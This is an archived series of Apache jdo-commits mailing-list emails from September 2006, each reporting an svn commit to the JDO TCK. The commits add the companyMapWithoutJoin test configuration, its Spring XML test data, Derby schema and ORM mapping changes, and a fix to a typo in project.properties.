eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 08 Sep 2006 14:50:38 -0700 Received: by eris.apache.org (Postfix, from userid 65534) id 7CBFD1A981A; Fri, 8 Sep 2006 14:50:18 -0700 (PDT) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r441669 - /db/jdo/trunk/tck20/src/conf/companyMapWithoutJoin.conf Date: Fri, 08 Sep 2006 21:50:18 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.1.0 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Author: mcaisse Date: Fri Sep 8 14:50:17 2006 New Revision: 441669 URL: http://svn.apache.org/viewvc?view=rev&rev=441669 Log: JDO-193 missing file Added: db/jdo/trunk/tck20/src/conf/companyMapWithoutJoin.conf Added: db/jdo/trunk/tck20/src/conf/companyMapWithoutJoin.conf URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/conf/companyMapWithoutJoin.conf?view=auto&rev=441669 ============================================================================== --- db/jdo/trunk/tck20/src/conf/companyMapWithoutJoin.conf (added) +++ db/jdo/trunk/tck20/src/conf/companyMapWithoutJoin.conf Fri Sep 8 14:50:17 2006 @@ -0,0 +1,7 @@ +jdo.tck.description = Completeness test with companyMapWithoutJoin model. +jdo.tck.mapping.companyfactory = org.apache.jdo.tck.pc.companyMapWithoutJoin.CompanyFactoryPMClass +jdo.tck.testdata = org/apache/jdo/tck/pc/companyMapWithoutJoin/companyMapWithoutJoin.xml +jdo.tck.standarddata = +jdo.tck.mapping = 9 +jdo.tck.classes = org.apache.jdo.tck.mapping.CompletenessTestMap +jdo.tck.requiredOptions = From [email protected] Fri Sep 08 22:57:38 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 27112 invoked from network); 8 Sep 2006 22:57:36 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Sep 2006 22:57:36 -0000 Received: (qmail 15796 invoked by uid 500); 8 Sep 2006 22:57:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jdo-commits.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 15784 invoked by uid 99); 8 Sep 2006 22:57:36 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 08 Sep 2006 15:57:36 -0700 X-ASF-Spam-Status: No, hits=-9.4 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 08 Sep 2006 15:57:35 -0700 Received: by eris.apache.org (Postfix, from userid 65534) id 7963F1A981A; Fri, 8 Sep 2006 15:57:15 -0700 (PDT) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r441681 - /db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema9.sql Date: Fri, 08 Sep 2006 22:57:15 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.1.0 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Author: mcaisse Date: Fri Sep 8 15:57:14 2006 New Revision: 441681 URL: http://svn.apache.org/viewvc?view=rev&rev=441681 Log: JDO-193 Added missing unique constraint to allow fk constraint. Modified: db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema9.sql Modified: db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema9.sql URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema9.sql?view=diff&rev=441681&r1=441680&r2=441681 ============================================================================== --- db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema9.sql (original) +++ db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema9.sql Fri Sep 8 15:57:14 2006 @@ -63,6 +63,7 @@ CONSTRAINT PERS_MANAGER_FK FOREIGN KEY (MANAGER) REFERENCES persons, CONSTRAINT PERS_MENTOR_FK FOREIGN KEY (MENTOR) REFERENCES persons, CONSTRAINT PERS_HRADVISOR_FK FOREIGN KEY (HRADVISOR) REFERENCES persons, + CONSTRAINT PERS_UK UNIQUE (PERSONID), CONSTRAINT PERS_PK PRIMARY KEY (DATASTORE_IDENTITY) ); From [email protected] Fri Sep 08 23:23:04 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 33517 invoked from network); 8 Sep 2006 23:23:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Sep 2006 23:23:00 -0000 Received: (qmail 40566 invoked by uid 500); 8 Sep 2006 23:22:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jdo-commits.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 40549 invoked by uid 99); 8 Sep 2006 23:22:59 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 08 Sep 2006 16:22:59 -0700 X-ASF-Spam-Status: No, hits=-9.4 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 08 Sep 2006 16:22:58 -0700 Received: by eris.apache.org (Postfix, from userid 65534) id A1DD81A981A; Fri, 8 Sep 2006 16:22:38 -0700 (PDT) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r441687 - in /db/jdo/trunk/tck20/src/testdata/org/apache/jdo/tck/pc/companyMapWithoutJoin: ./ companyMapWithoutJoin.xml Date: Fri, 08 Sep 2006 23:22:38 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.1.0 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Author: mcaisse Date: Fri Sep 8 16:22:37 2006 New Revision: 441687 URL: http://svn.apache.org/viewvc?view=rev&rev=441687 Log: JDO-193 More missing files Added: db/jdo/trunk/tck20/src/testdata/org/apache/jdo/tck/pc/companyMapWithoutJoin/ db/jdo/trunk/tck20/src/testdata/org/apache/jdo/tck/pc/companyMapWithoutJoin/companyMapWithoutJoin.xml Added: db/jdo/trunk/tck20/src/testdata/org/apache/jdo/tck/pc/companyMapWithoutJoin/companyMapWithoutJoin.xml URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/testdata/org/apache/jdo/tck/pc/companyMapWithoutJoin/companyMapWithoutJoin.xml?view=auto&rev=441687 ============================================================================== --- db/jdo/trunk/tck20/src/testdata/org/apache/jdo/tck/pc/companyMapWithoutJoin/companyMapWithoutJoin.xml (added) +++ db/jdo/trunk/tck20/src/testdata/org/apache/jdo/tck/pc/companyMapWithoutJoin/companyMapWithoutJoin.xml Fri Sep 8 16:22:37 2006 @@ -0,0 +1,151 @@ +<?xml version="1.0" encoding="UTF-8"?> +<!DOCTYPE beans PUBLIC "-//SPRING//DTD BEAN//EN" "http://www.springframework.org/dtd/spring-beans.dtd"> + +<beans> + <description>Company instances for CompletenessTest with Map without join table</description> + + <bean id="root" class="java.util.ArrayList"> + <constructor-arg index="0"> + <list> + <ref local="company1"/> + </list> + </constructor-arg> + </bean> + + <bean id="company1" factory-bean="companyFactory" factory-method="newCompany"> + <constructor-arg index="0" type="long"><value>1</value></constructor-arg> + <constructor-arg index="1" type="java.lang.String"><value>Sun Microsystems, Inc.</value></constructor-arg> + <constructor-arg index="2" type="java.util.Date"><value>11/Apr/1952</value></constructor-arg> + <property name="departments"> + <set> + <ref local="dept1"/> + <ref local="dept2"/> + </set> + </property> + </bean> + + <bean id="dept1" factory-bean="companyFactory" factory-method="newDepartment"> + <constructor-arg index="0" type="long"><value>1</value></constructor-arg> + <constructor-arg index="1" type="java.lang.String" ><value>Development</value></constructor-arg> + <property name="company"><ref bean="company1"/></property> + <property name="roles"> + <map> + <entry key="role1"> + <ref local="emp1"/> + </entry> + <entry key="role2"> + <ref local="emp2"/> + </entry> + <entry key="role3"> + <ref local="emp3"/> + </entry> + </map> + </property> + </bean> + + <bean id="dept2" factory-bean="companyFactory" factory-method="newDepartment"> + <constructor-arg index="0" type="long"><value>2</value></constructor-arg> + <constructor-arg index="1" type="java.lang.String" ><value>Human Resources</value></constructor-arg> + <property name="company"><ref bean="company1"/></property> + <property name="roles"> + <map> + <entry key="role4"> + <ref local="emp4"/> + </entry> + <entry key="role5"> + <ref local="emp5"/> + </entry> + </map> + </property> + </bean> + + <bean id="emp1" factory-bean="companyFactory" factory-method="newFullTimeEmployee"> + <constructor-arg index="0" type="long"><value>1</value></constructor-arg> + <constructor-arg index="1" type="java.lang.String"><value>emp1First</value></constructor-arg> + <constructor-arg index="2" type="java.lang.String"><value>emp1Last</value></constructor-arg> + <constructor-arg index="3" type="java.lang.String"><value>emp1Middle</value></constructor-arg> + <constructor-arg index="4" type="java.util.Date"><value>10/Jun/1970</value></constructor-arg> + <constructor-arg index="5" type="java.util.Date"><value>1/Jan/1999</value></constructor-arg> + <constructor-arg index="6" type="java.lang.String"><value>role1</value></constructor-arg> + <constructor-arg index="7" type="double"><value>60000</value></constructor-arg> + <property name="weeklyhours"><value>40</value></property> + <property name="department"><ref bean="dept1"/></property> + <property name="fundingDept"><ref bean="dept2"/></property> + <property name="manager"><ref bean="emp2"/></property> + <property name="hradvisor"><ref bean="emp5"/></property> + </bean> + <bean id="emp2" factory-bean="companyFactory" factory-method="newFullTimeEmployee"> + <constructor-arg index="0" type="long"><value>2</value></constructor-arg> + <constructor-arg index="1" type="java.lang.String"><value>emp2First</value></constructor-arg> + <constructor-arg index="2" type="java.lang.String"><value>emp2Last</value></constructor-arg> + <constructor-arg index="3" type="java.lang.String"><value>emp2Middle</value></constructor-arg> + <constructor-arg index="4" type="java.util.Date"><value>22/Dec/1975</value></constructor-arg> + <constructor-arg index="5" type="java.util.Date"><value>1/Jul/2003</value></constructor-arg> + <constructor-arg index="6" type="java.lang.String"><value>role2</value></constructor-arg> + <constructor-arg index="7" type="double"><value>47000</value></constructor-arg> + <property name="weeklyhours"><value>40</value></property> + <property name="department"><ref bean="dept1"/></property> + <property name="fundingDept"><ref bean="dept1"/></property> + <property name="hradvisor"><ref bean="emp5"/></property> + <property name="team"> + <set> + <ref local="emp1"/> + <ref local="emp3"/> + <ref local="emp4"/> + <ref local="emp5"/> + </set> + </property> + </bean> + <bean id="emp3" factory-bean="companyFactory" factory-method="newPartTimeEmployee"> + <constructor-arg index="0" type="long"><value>3</value></constructor-arg> + <constructor-arg index="1" type="java.lang.String"><value>emp3First</value></constructor-arg> + <constructor-arg index="2" type="java.lang.String"><value>emp3Last</value></constructor-arg> + <constructor-arg index="3" type="java.lang.String"><value>emp3Middle</value></constructor-arg> + <constructor-arg index="4" type="java.util.Date"><value>5/Sep/1972</value></constructor-arg> + <constructor-arg index="5" type="java.util.Date"><value>15/Aug/2002</value></constructor-arg> + <constructor-arg index="6" type="java.lang.String"><value>role3</value></constructor-arg> + <constructor-arg index="7" type="double"><value>67.00</value></constructor-arg> + <property name="weeklyhours"><value>19</value></property> + <property name="department"><ref bean="dept1"/></property> + <property name="fundingDept"><ref bean="dept1"/></property> + <property name="manager"><ref bean="emp2"/></property> + <property name="hradvisor"><ref bean="emp5"/></property> + </bean> + <bean id="emp4" factory-bean="companyFactory" factory-method="newPartTimeEmployee"> + <constructor-arg index="0" type="long"><value>4</value></constructor-arg> + <constructor-arg index="1" type="java.lang.String"><value>emp4First</value></constructor-arg> + <constructor-arg index="2" type="java.lang.String"><value>emp4Last</value></constructor-arg> + <constructor-arg index="3" type="java.lang.String"><value>emp4Middle</value></constructor-arg> + <constructor-arg index="4" type="java.util.Date"><value>6/Sep/1973</value></constructor-arg> + <constructor-arg index="5" type="java.util.Date"><value>15/Apr/2001</value></constructor-arg> + <constructor-arg index="6" type="java.lang.String"><value>role4</value></constructor-arg> + <constructor-arg index="7" type="double"><value>37.00</value></constructor-arg> + <property name="department"><ref bean="dept2"/></property> + <property name="fundingDept"><ref bean="dept2"/></property> + <property name="manager"><ref bean="emp2"/></property> + <property name="hradvisor"><ref bean="emp5"/></property> + </bean> + <bean id="emp5" factory-bean="companyFactory" factory-method="newFullTimeEmployee"> + <constructor-arg index="0" type="long"><value>5</value></constructor-arg> + <constructor-arg index="1" type="java.lang.String"><value>emp5First</value></constructor-arg> + <constructor-arg index="2" type="java.lang.String"><value>emp5Last</value></constructor-arg> + <constructor-arg index="3" type="java.lang.String"><value>emp5Middle</value></constructor-arg> + <constructor-arg index="4" type="java.util.Date"><value>5/Jul/1962</value></constructor-arg> + <constructor-arg index="5" type="java.util.Date"><value>15/Aug/1998</value></constructor-arg> + <constructor-arg index="6" type="java.lang.String"><value>role5</value></constructor-arg> + <constructor-arg index="7" type="double"><value>73000</value></constructor-arg> + <property name="department"><ref bean="dept2"/></property> + <property name="fundingDept"><ref bean="dept2"/></property> + <property name="manager"><ref bean="emp2"/></property> + <property name="hradvisees"> + <set> + <ref local="emp1"/> + <ref local="emp2"/> + <ref local="emp3"/> + <ref local="emp4"/> + </set> + </property> + </bean> + +</beans> + From [email protected] Fri Sep 08 23:45:35 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 36860 invoked from network); 8 Sep 2006 23:45:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Sep 2006 23:45:33 -0000 Received: (qmail 51982 invoked by uid 500); 8 Sep 2006 23:45:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jdo-commits.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 51971 invoked by uid 99); 8 Sep 2006 23:45:33 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 08 Sep 2006 16:45:33 -0700 X-ASF-Spam-Status: No, hits=-9.4 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 08 Sep 2006 16:45:32 -0700 Received: by eris.apache.org (Postfix, from userid 65534) id 7387F1A981A; Fri, 8 Sep 2006 16:45:12 -0700 (PDT) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r441692 - /db/jdo/trunk/tck20/project.properties Date: Fri, 08 Sep 2006 23:45:12 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.1.0 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Author: mcaisse Date: Fri Sep 8 16:45:11 2006 New Revision: 441692 URL: http://svn.apache.org/viewvc?view=rev&rev=441692 Log: (empty) Modified: db/jdo/trunk/tck20/project.properties Modified: db/jdo/trunk/tck20/project.properties URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/project.properties?view=diff&rev=441692&r1=441691&r2=441692 ============================================================================== --- db/jdo/trunk/tck20/project.properties (original) +++ db/jdo/trunk/tck20/project.properties Fri Sep 8 16:45:11 2006 @@ -103,6 +103,13 @@ org/apache/jdo/tck/pc/company/MedicalInsurance.java \ org/apache/jdo/tck/pc/company/PartTimeEmployee.java \ org/apache/jdo/tck/pc/company/Project.java \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/Company.java \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/Department.java \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/Person.java \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/Employee.java \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/FullTimeEmployee.java \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/Insurance.java \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/PartTimeEmployee.java \ org/apache/jdo/tck/pc/fieldtypes/AllTypes.java \ org/apache/jdo/tck/pc/fieldtypes/ArrayCollections.java \ org/apache/jdo/tck/pc/fieldtypes/ArrayListCollections.java \ @@ -208,6 +215,12 @@ org/apache/jdo/tck/pc/company/MedicalInsurance.class \ org/apache/jdo/tck/pc/company/PartTimeEmployee.class \ org/apache/jdo/tck/pc/company/Project.class \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/Company.class \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/Department.class \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/Person.class \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/Employee.class \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/FullTimeEmployee.class \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/PartTimeEmployee.class \ org/apache/jdo/tck/pc/fieldtypes/AllTypes.class \ org/apache/jdo/tck/pc/fieldtypes/ArrayCollections.class \ org/apache/jdo/tck/pc/fieldtypes/ArrayListCollections.class \ @@ -334,6 +347,7 @@ package.jdo \ org/apache/jdo/tck/api/instancecallbacks/package.jdo \ org/apache/jdo/tck/pc/company/package.jdo \ + org/apache/jdo/tck/pc/companyMapWithoughtJoin/package.jdo \ org/apache/jdo/tck/pc/fieldtypes/AllTypes.jdo \ org/apache/jdo/tck/pc/fieldtypes/ArrayCollections.jdo \ org/apache/jdo/tck/pc/fieldtypes/ArrayListCollections.jdo \ From [email protected] Sat Sep 09 18:44:24 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23546 invoked from network); 9 Sep 2006 18:44:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Sep 2006 18:44:21 -0000 Received: (qmail 91462 invoked by uid 500); 9 Sep 2006 18:44:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jdo-commits.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 91451 invoked by uid 99); 9 Sep 2006 18:44:20 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 09 Sep 2006 11:44:20 -0700 X-ASF-Spam-Status: No, hits=-9.4 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 09 Sep 2006 11:44:20 -0700 Received: by eris.apache.org (Postfix, from userid 65534) id 0C5E51A981A; Sat, 9 Sep 2006 11:44:00 -0700 (PDT) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r441842 - /db/jdo/trunk/tck20/project.properties Date: Sat, 09 Sep 2006 18:43:59 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.1.0 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Author: clr Date: Sat Sep 9 11:43:59 2006 New Revision: 441842 URL: http://svn.apache.org/viewvc?view=rev&rev=441842 Log: JDO-420 fixed typo in project properties; patch provided by Andy Jefferson Modified: db/jdo/trunk/tck20/project.properties Modified: db/jdo/trunk/tck20/project.properties URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/project.properties?view=diff&rev=441842&r1=441841&r2=441842 ============================================================================== --- db/jdo/trunk/tck20/project.properties (original) +++ db/jdo/trunk/tck20/project.properties Sat Sep 9 11:43:59 2006 @@ -347,7 +347,7 @@ package.jdo \ org/apache/jdo/tck/api/instancecallbacks/package.jdo \ org/apache/jdo/tck/pc/company/package.jdo \ - org/apache/jdo/tck/pc/companyMapWithoughtJoin/package.jdo \ + org/apache/jdo/tck/pc/companyMapWithoutJoin/package.jdo \ org/apache/jdo/tck/pc/fieldtypes/AllTypes.jdo \ org/apache/jdo/tck/pc/fieldtypes/ArrayCollections.jdo \ org/apache/jdo/tck/pc/fieldtypes/ArrayListCollections.jdo \ From [email protected] Thu Sep 14 21:07:21 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 12517 invoked from network); 14 Sep 2006 21:07:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Sep 2006 21:07:21 -0000 Received: (qmail 26922 invoked by uid 500); 14 Sep 2006 21:07:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jdo-commits.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 26911 invoked by uid 99); 14 Sep 2006 21:07:21 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 14 Sep 2006 14:07:21 -0700 X-ASF-Spam-Status: No, hits=-9.8 required=5.0 tests=ALL_TRUSTED,NO_REAL_NAME Received: from ([161.129.204.104:64647] helo=eris.apache.org) by idunn.apache.osuosl.org (ecelerity 2.1 r(10620)) with ESMTP id EB/10-07567-E34C9054 for <[email protected]>; Thu, 14 Sep 2006 14:07:21 -0700 Received: by eris.apache.org (Postfix, from userid 65534) id 2E3B51A981A; Thu, 14 Sep 2006 14:06:04 -0700 (PDT) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r443469 - in /db/jdo/trunk/tck20/src: conf/ orm/applicationidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/ orm/datastoreidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/ sql/derby/applicationidentity/ sql/derby/datastoreidentity/ Date: Thu, 14 Sep 2006 21:06:03 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.1.0 Message-Id: <[email protected]> X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Author: mcaisse Date: Thu Sep 14 14:06:03 2006 New Revision: 443469 URL: http://svn.apache.org/viewvc?view=rev&rev=443469 Log: (empty) Modified: db/jdo/trunk/tck20/src/conf/configurations.list db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package-standard9.orm db/jdo/trunk/tck20/src/orm/datastoreidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package-standard9.orm db/jdo/trunk/tck20/src/sql/derby/applicationidentity/schema9.sql db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema9.sql Modified: db/jdo/trunk/tck20/src/conf/configurations.list URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/conf/configurations.list?view=diff&rev=443469&r1=443468&r2=443469 ============================================================================== --- db/jdo/trunk/tck20/src/conf/configurations.list (original) +++ db/jdo/trunk/tck20/src/conf/configurations.list Thu Sep 14 14:06:03 2006 @@ -19,6 +19,7 @@ company1-MRelationships.conf \ companyM-MRelationships.conf \ companyAllRelationships.conf \ + companyMapWithoutJoin.conf \ companyPMClass.conf \ companyPMInterface.conf \ inheritance1.conf \ Modified: db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package-standard9.orm URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package-standard9.orm?view=diff&rev=443469&r1=443468&r2=443469 ============================================================================== --- db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package-standard9.orm (original) +++ db/jdo/trunk/tck20/src/orm/applicationidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package-standard9.orm Thu Sep 14 14:06:03 2006 @@ -42,6 +42,7 @@ <inheritance strategy="superclass-table"/> <field name="hiredate" column="HIREDATE"/> <field name="weeklyhours" column="WEEKLYHOURS"/> + <field name="role" column="ROLE"/> <field name="department" column="DEPARTMENT"> <foreign-key/> </field> Modified: db/jdo/trunk/tck20/src/orm/datastoreidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package-standard9.orm URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/orm/datastoreidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package-standard9.orm?view=diff&rev=443469&r1=443468&r2=443469 ============================================================================== --- db/jdo/trunk/tck20/src/orm/datastoreidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package-standard9.orm (original) +++ db/jdo/trunk/tck20/src/orm/datastoreidentity/org/apache/jdo/tck/pc/companyMapWithoutJoin/package-standard9.orm Thu Sep 14 14:06:03 2006 @@ -45,6 +45,7 @@ <inheritance strategy="superclass-table"/> <field name="hiredate" column="HIREDATE"/> <field name="weeklyhours" column="WEEKLYHOURS"/> + <field name="role" column="ROLE"/> <field name="department" column="DEPARTMENT"> <foreign-key/> </field> Modified: db/jdo/trunk/tck20/src/sql/derby/applicationidentity/schema9.sql URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/sql/derby/applicationidentity/schema9.sql?view=diff&rev=443469&r1=443468&r2=443469 ============================================================================== --- db/jdo/trunk/tck20/src/sql/derby/applicationidentity/schema9.sql (original) +++ db/jdo/trunk/tck20/src/sql/derby/applicationidentity/schema9.sql Thu Sep 14 14:06:03 2006 @@ -45,6 +45,7 @@ BIRTHDATE VARCHAR(32) NOT NULL, DISCRIMINATOR varchar(64) NOT NULL, EMPID INTEGER NOT NULL, + ROLE VARCHAR(32), HIREDATE VARCHAR(32), WEEKLYHOURS REAL, DEPARTMENT INTEGER, Modified: db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema9.sql URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema9.sql?view=diff&rev=443469&r1=443468&r2=443469 ============================================================================== --- db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema9.sql (original) +++ db/jdo/trunk/tck20/src/sql/derby/datastoreidentity/schema9.sql Thu Sep 14 14:06:03 2006 @@ -48,6 +48,7 @@ BIRTHDATE VARCHAR(32) NOT NULL, DISCRIMINATOR varchar(64) NOT NULL, EMPID INTEGER NOT NULL, + ROLE VARCHAR(32), HIREDATE VARCHAR(32), WEEKLYHOURS REAL, DEPARTMENT INTEGER, From [email protected] Thu Sep 14 21:37:21 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23240 invoked from network); 14 Sep 2006 21:37:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Sep 2006 21:37:20 -0000 Received: (qmail 83419 invoked by uid 500); 14 Sep 2006 21:37:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jdo-commits.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 83408 invoked by uid 99); 14 Sep 2006 21:37:17 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 14 Sep 2006 14:37:17 -0700 X-ASF-Spam-Status: No, hits=-9.8 required=5.0 tests=ALL_TRUSTED,NO_REAL_NAME Received: from ([161.129.204.104:52839] helo=eris.apache.org) by idunn.apache.osuosl.org (ecelerity 2.1 r(10620)) with ESMTP id 08/B0-07618-C8BC9054 for <[email protected]>; Thu, 14 Sep 2006 14:37:16 -0700 Received: by eris.apache.org (Postfix, from userid 65534) id C32641A981C; Thu, 14 Sep 2006 14:37:14 -0700 (PDT) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r443483 - in /db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/query/delete: DeletePersistentAll.java DeleteQueryElements.java Date: Thu, 14 Sep 2006 21:37:14 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.1.0 Message-Id: <[email protected]> X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Author: mbo Date: Thu Sep 14 14:37:14 2006 New Revision: 443483 URL: http://svn.apache.org/viewvc?view=rev&rev=443483 Log: JDO-411: changing delete-by-query test cases such that there are no FK referencing deleted instances Modified: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/query/delete/DeletePersistentAll.java db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/query/delete/DeleteQueryElements.java Modified: 